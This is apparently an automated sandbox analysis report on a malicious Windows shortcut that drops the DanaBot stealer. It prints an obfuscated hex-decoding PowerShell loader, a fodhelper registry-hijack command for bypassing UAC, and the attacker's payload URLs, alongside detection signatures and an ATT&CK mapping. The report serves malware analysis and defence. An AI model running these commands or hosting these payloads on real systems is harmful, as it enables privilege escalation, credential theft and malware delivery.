f97180e1a5489a15a3e5f7db53356e7f7869f6731f3815b6f7e852698335fa8bab0a12f68f66ee399ca6b7d1994fced4bfb476066214d61a279b592bede9bc4173840d28016672e7995c751b825a18ad0960afbbba9071cc631fad152ebe5d6da49db75b7bd20456369cda6719eca0462c83310f3f5ac28103792deeacdfa6a31d127726b84a5a8e39a884df8fecda2cdec9dc279c956d253761973c9ea36666f0c5dd4c4f3306483bf6811c7ed4f0265f0e66ff777c5bb9a9b4324c54769c9b5d706b4ec485997d1adb50fd71564b9401e52e3a3f5cbbccb76bed1b5cf3af43b7e7c4c42dea2a7f2e21992968faa86787095556c265abb0db1b02f1c5c06e0b96eb6b38f98aa3878e78e92a9d5fba55b149c8dd782681a530f1c11d94505305c1ee8ef1f25970104e28dff99776f3628512c465dc2125a38927e4cfd827415d33dc2de13d550c5cd8abcd58eff5ef4b7cdfe93710eb277c3304084bd9201e5dabdebe54faef993c8a690421ab366c5cf613f7cac0628aad89849b65fff1054cb508e8d107d332de6e06598c86c6e7b2aa72a92b5d11793da067088a83abf915b5b690ef77973fdd05902457333bf3d9982ddc982ca6e51de08faee2b7b87dc3b7d2556d18306a68f6827eb9c7a69cea51744ac77093a6ddafbede1293f9be816ebb61f0ad6d7c6984f007ad085896b84a1791374ae2d29767fa6682b78e157c46b6b622fb0cc14fd5acf701f64474b5d1afbad672c4e15effe1ca5fbb418a59ab3ce357c55b1cc5c02697ed0b7dc5750ff0a46291413a4591cfd4e3b029f565168af5ee6c643baba78a73e0e7f2e781a6f2bb5b74b6d360125440c06278e8e7ac7a76d248db1e208518388f10a6bab46d4c01520d56940cd56758727e9268671527569a7159b1296762de8d769ddaf8005189ed580c0a99027d6d7c7986c91bb71beb4cf71419813de3cc12b2befea0bd89c8803d19d50f5348e88eb7a49f42528fcf43aa90404ef92e9cd2fd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('653adb09197706bff248b833ea1f27f5d58878713451ba8f31b442364ad50b177565132c81a8ce0c04335fb368b1bec213971455480775829f6bc6c5534155f957e2cfa508a5fe4c311e066403190fb60b4c1cbcaa36cdf33d5f614fd5f67a8c2528ebc6c4b5b8a0bce76a43045b19c3efd6f5ef3ba1ecb5686bd73b304c0491078b179da1ca0ae1f3da25490e7b58ee2ff863e346260adacb21649ff36146554f42d087971f82489ab30989e3f0674f581c0cf80616e540bcaa41b0428afce3f21fedf2f8472f6163e56ee7f1258524a03f60db1043baa3a075884983f2cf092375522f8988e476af72dc3c2fc7adc9fe0507992c92239aec2429066ebbd2b17cd0cf69b5f864c012338d6d8dd368382c5160478c96e06e3861df4b0a736f2572d32b9090b656b519c9ee189c51f0156b1592fee6ea266869208339b1f4a4cd0c9d18d67d96f8edeabc3c915510c81009138cdc34ed0e78c7b482df473e7eb8a0b3b274003f057ff8e56d8ee713118a6b7733a69e09e35c4f1734dc2cd1de6ac8baf5167083e43f074961524961b7179d937805ac28e554a85ffb0fce8ffc6971bd36500b19554e2cf2c414fd3f7d20f637c3fed2cbe4f16d815833af6587c0445b171f727757fcb88407da064e176d7ac09be6f81860913c206895922fa10cfc3d057e32f3236cb84f7ae4d8c4681039f91ad409d0ee7a284e00484796bdfd0c577c1033fc2b929938ae4ebe01ca086a4ef8df874cdfa55de6194b2add9fbbde3b65169b4ce6fc4c5d063449d421c5df87aeb418d87eb94d8085a780cff969515bfbeb7cdaa25c3e5ddf20fbb0a604b6ddaadcf97b9534a77f8a73360422df52b6736926bfb5d66ced1f6f797f1b6d9ade5e074859d887e8c3bad2d33a412611ba85a6107b8f004e605620d5e3f4fba15b1ff642ab09a70a27bfe4f97180e1a5489a15a3e5f7db53356e7f7869f6731f3815b6f7e852698335fa8bab0a12f68f66ee399ca6b7d1994fced4bfb476066214d61a279b592bede9bc4173840d28016672e7995c751b825a18ad0960afbbba9071cc631fad152ebe5d6da49db75b7bd20456369cda6719eca0462c83310f3f5ac28103792deeacdfa6a31d127726b84a5a8e39a884df8fecda2cdec9dc279c956d253761973c9ea36666f0c5dd4c4f3306483bf6811c7ed4f0265f0e66ff777c5bb9a9b4324c54769c9b5d706b4ec485997d1adb50fd71564b9401e52e3a3f5cbbccb76bed1b5cf3af43b7e7c4c42dea2a7f2e21992968faa86787095556c265abb0db1b02f1c5c06e0b96eb6b38f98aa3878e78e92a9d5fba55b149c8dd782681a530f1c11d94505305c1ee8ef1f25970104e28dff99776f3628512c465dc2125a38927e4cfd827415d33dc2de13d550c5cd8abcd58eff5ef4b7cdfe93710eb277c3304084bd9201e5dabdebe54faef993c8a690421ab366c5cf613f7cac0628aad89849b65fff1054cb508e8d107d332de6e06598c86c6e7b2aa72a92b5d11793da067088a83abf915b5b690ef77973fdd05902457333bf3d9982ddc982ca6e51de08faee2b7b87dc3b7d2556d18306a68f6827eb9c7a69cea51744ac77093a6ddafbede1293f9be816ebb61f0ad6d7c6984f007ad085896b84a1791374ae2d29767fa6682b78e157c46b6b622fb0cc14fd5acf701f64474b5d1afbad672c4e15effe1ca5fbb418a59ab3ce357c55b1cc5c02697ed0b7dc5750ff0a46291413a4591cfd4e3b029f565168af5ee6c643baba78a73e0e7f2e781a6f2bb5b74b6d360125440c06278e8e7ac7a76d248db1e208518388f10a6bab46d4c01520d56940cd56758727e9268671527569a7159b1296762de8d769ddaf8005189ed580c0a99027d6d7c7986c91bb71beb4cf71419813de3cc12b2befea0bd89c8803d19d50f5348e88eb7a49f42528fcf43aa90404ef92e9cd2fdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"Jump to behavior
          Source: mama.exe, 0000002B.00000003.1618824342.000000007E870000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32U
          Source: mama.exe, 0000002B.00000003.1618824342.000000007E870000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: explorer.exeShell_TrayWnd
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,43_2_02F7E2C8
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,43_2_02F7D768
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Users\user\AppData\Roaming\mama.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mama.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_03435920 GetVersionExW,GetVersionExW,LoadLibraryW,43_2_03435920
          Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR
          Source: Yara matchFile source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		1
          Scripting          		12
          Process Injection          		11
          Masquerading          		OS Credential Dumping211
          Security Software Discovery          		Remote Services1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts12
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Modify Registry          		LSASS Memory12
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Native API          		Logon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion          		Security Account Manager131
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Multi-hop Proxy          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login HookLogin Hook12
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets3
          File and Directory Discovery          		SSHKeylogging13
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials165
          System Information Discovery          		VNCGUI Input Capture1
          Proxy          		Data Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581224 Sample: vreFmptfUu.lnk Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 87 pravo-bashkortostan.ru 2->87 89 x1.i.lencr.org 2->89 91 bg.microsoft.map.fastly.net 2->91 101 Suricata IDS alerts for network traffic 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 Windows shortcut file (LNK) starts blacklisted processes 2->105 107 8 other signatures 2->107 15 ssh.exe 2 2->15         started        18 svchost.exe 1 1 2->18         started        signatures3 process4 dnsIp5 125 Windows shortcut file (LNK) starts blacklisted processes 15->125 21 powershell.exe 7 15->21         started        24 conhost.exe 1 15->24         started        93 127.0.0.1 unknown unknown 18->93 signatures6 process7 signatures8 109 Windows shortcut file (LNK) starts blacklisted processes 21->109 111 Powershell drops PE file 21->111 26 powershell.exe 7 21->26         started        process9 signatures10 115 Windows shortcut file (LNK) starts blacklisted processes 26->115 29 mshta.exe 16 26->29         started        process11 dnsIp12 95 pravo-bashkortostan.ru 150.241.97.10, 443, 49708, 49728 TECNALIAES Spain 29->95 119 Windows shortcut file (LNK) starts blacklisted processes 29->119 121 Suspicious powershell command line found 29->121 33 powershell.exe 16 20 29->33         started        signatures13 process14 file15 83 C:\Users\user\AppData\Roaming\mama.exe, PE32 33->83 dropped 85 C:\Users\user\AppData\Local\Temp\r.bat, ASCII 33->85 dropped 99 Windows shortcut file (LNK) starts blacklisted processes 33->99 37 cmd.exe 33->37         started        40 cmd.exe 1 33->40         started        42 cmd.exe 33->42         started        44 3 other processes 33->44 signatures16 process17 signatures18 113 Uses cmd line tools excessively to alter registry or file data 37->113 46 fodhelper.exe 37->46         started        61 2 other processes 37->61 49 fodhelper.exe 3 12 40->49         started        51 reg.exe 1 1 40->51         started        53 reg.exe 1 1 40->53         started        55 reg.exe 42->55         started        57 reg.exe 42->57         started        59 AcroCEF.exe 44->59         started        63 2 other processes 44->63 process19 signatures20 123 Windows shortcut file (LNK) starts blacklisted processes 46->123 65 cmd.exe 46->65         started        68 cmd.exe 1 49->68         started        70 AcroCEF.exe 59->70         started        process21 signatures22 97 Windows shortcut file (LNK) starts blacklisted processes 65->97 72 cmd.exe 65->72         started        74 conhost.exe 65->74         started        76 cmd.exe 1 68->76         started        79 conhost.exe 68->79         started        process23 signatures24 117 Windows shortcut file (LNK) starts blacklisted processes 76->117 81 conhost.exe 76->81         started        process25

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          vreFmptfUu.lnk37%ReversingLabsShortcut.Trojan.Pantera
          vreFmptfUu.lnk39%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\mama.exe100%AviraTR/ATRAPS.Gen
          C:\Users\user\AppData\Roaming\mama.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\mama.exe71%ReversingLabsWin32.Trojan.Danabot

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://pravo-bashkortostan.ru/aaa.mp4$global:?0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/ggg.pdf0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4foigf0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4gramFiles(x86)=C:0%Avira URL Cloudsafe
